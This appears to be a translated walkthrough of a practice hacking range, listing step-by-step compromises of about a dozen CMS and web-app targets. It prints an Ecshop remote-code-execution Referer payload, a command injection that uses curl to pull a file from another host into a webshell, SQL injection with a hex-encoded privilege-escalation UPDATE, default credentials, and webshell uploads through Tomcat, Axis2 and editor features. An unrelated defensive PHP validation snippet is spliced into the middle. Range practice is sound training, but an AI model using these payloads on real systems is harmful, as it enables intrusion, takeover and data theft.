Yunyan range system test

http://63053cf3af6fe0aa.yunyansec.com/

Ecshop v3.0 remote code execution

Visit user.php and add the header:

Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:289:”*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1′ UNION/*”;}45ea207d7a2b68c49582d2d22adf953a

1.php is generated in the web root, password 1337

http://b5bddb48175c113e.yunyansec.com/

about.php can download files

http://b5bddb48175c113e.yunyansec.com/download.php?a=address.txt

Change address.txt to download.php

Visit admin: 403

Visit admin/login.php

Download http://b5bddb48175c113e.yunyansec.com/download.php?a=admin/login.php and see check.php

Download http://b5bddb48175c113e.yunyansec.com/download.php?a=admin/check.php and see mainx1112111.php

Download http://b5bddb48175c113e.yunyansec.com/download.php?a=admin/mainx1112111.php and see <?php system("ping -c 2".$_GET[ip]);?>

Bypass the space filter on the command execution with ";", use curl to download a file, getshell

b5bddb48175c113e.yunyansec.com/admin/mainx1112111.php?ip=11;curl http://63053cf3af6fe0aa.yunyansec.com/fuck.html > look.php
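The line found in mainx1112111.php above is the textbook shell-injection pattern: the ip parameter is concatenated straight into the command, so filtering spaces does nothing because ";" needs none. As an added example (not from the original writeup), here is a hardened replacement that validates the parameter as an IP address with filter_var and quotes it with escapeshellarg; the sample inputs are constructed.

```php
<?php
// Added example, not part of the original writeup.
// Vulnerable original: system("ping -c 2".$_GET[ip]);
// Any shell metacharacter (; | && $() backticks) in ip appends a second
// command, and a blacklist of spaces does not stop ";".

// Hardened version: accept only a syntactically valid IPv4/IPv6 address,
// then quote it for the shell anyway (defence in depth). Returns null when
// the input is rejected so the caller can answer with HTTP 400 instead of
// running anything.
function build_ping_command(string $ip): ?string {
    $validated = filter_var($ip, FILTER_VALIDATE_IP);
    if ($validated === false) {
        return null;
    }
    return 'ping -c 2 ' . escapeshellarg($validated);
}

function run_ping(string $ip): string {
    $cmd = build_ping_command($ip);
    if ($cmd === null) {
        http_response_code(400);
        return "invalid ip parameter\n";
    }
    // Only a validated, quoted address ever reaches the shell.
    return (string) shell_exec($cmd);
}

// Constructed sample inputs: one benign IPv4, one IPv6, two hostile.
$samples = [
    '127.0.0.1',
    '::1',
    '11;curl http://example.invalid/a > look.php',  // ";" separator, as in the writeup
    '8.8.8.8 -c 100',                                // extra flags via a space
];

foreach ($samples as $s) {
    $cmd = build_ping_command($s);
    printf("%-45s -> %s\n", $s, $cmd ?? 'REJECTED');
}
```

Running the loop shows the two addresses accepted and quoted and the two hostile strings rejected before any command is built; run_ping is the drop-in handler for the ip parameter.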

http://e4dcb0cc015585c8.yunyansec.com/

Read the Tomcat configuration file:

Upload a WAR package through the default Tomcat manager interface, getshell

http://e3636c9c755c1643.yunyansec.com/

X-Forwarded-For SQL injection

admin:P4ssw0rd

Log in, New Picture, upload an image

Upload an image containing a one-line webshell, then change the extension; the uploaded PHP file is visible on the home page, giving a webshell

http://0c0c723dc8a07d37.yunyansec.com/

http://0c0c723dc8a07d37.yunyansec.com/axis2/axis2-admin/login

Default Axis2 username and password

Username: admin, Password: axis2

Deploy an AAR package, execute commands, getshell

http://f0d8d92ecd163338.yunyansec.com

Before and after forging:

NjFiNTQ1OWIwMDli NjAuMjAuMTY3LjEyMzE1NDMwNjUwMzU2ODM YmY5NA

NjFiNTQ1OWIwMDli MTI3LjAuMC4xJiMwMzk7MTU0MzA0ODQxNjc1MA YmY5NA


Forge the login, then in System settings allow PHP uploads, Menu management, upload image

http://34c3ae0a4b6027db.yunyansec.com/

Register the account fuckyou, then craft a request that elevates the user to super privilege

http://34c3ae0a4b6027db.yunyansec.com/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%20@b;execute%20x;

Log in to the admin panel

http://34c3ae0a4b6027db.yunyansec.com/admin.php?m=user&f=login

Get a shell from the admin panel: Interface, Material management, upload material to bypass the restriction that the editor cannot modify files, change it to a one-line webshell, then connect to index.php

http://090b41fbb2665fab.yunyansec.com

http://090b41fbb2665fab.yunyansec.com/admin/login.php

Weak password: admin / admin

Column management: create a new top-level category and write a one-line webshell into it, then connect to data/class.php

http://a878d407d9dbe312.yunyansec.com/

http://a878d407d9dbe312.yunyansec.com/eWebEditor/admin/default.php

eWebEditor 2.8, the CMS editor's default username and password

admin

DvcFsyHHuvHM5wV4

In Style management add a remote upload of a PHP file and preview the style; host the file on a site configured not to parse PHP, upload the PHP file remotely, getshell

http://745f5fbcefe848ba.yunyansec.com/

74cms v3.6 redirects to the installation page on first visit; after installing against a remote database, log in to the admin panel

Admin tools, Style templates

admin/admin_templates.php?act=edit_file&tpl_name=header.htm&tpl_dir=default

Add PHP that writes a file to the template file, add a scheduled task, run the scheduled task; shell.php is generated in the admin directory

http://3e2796e9ca1a434f.yunyansec.com/

PigCms 3.1 (微最强™ backend V3.0 major upgrade)

The account registration has SQL injection

Injection yields the credentials admin / asdf412afa

The admin pages have been deleted; obtain the post-login cookie

Set up the same version locally, enable PHP uploads in the admin settings, capture and modify the request

Use ckeditor to upload a PHP file, getshell
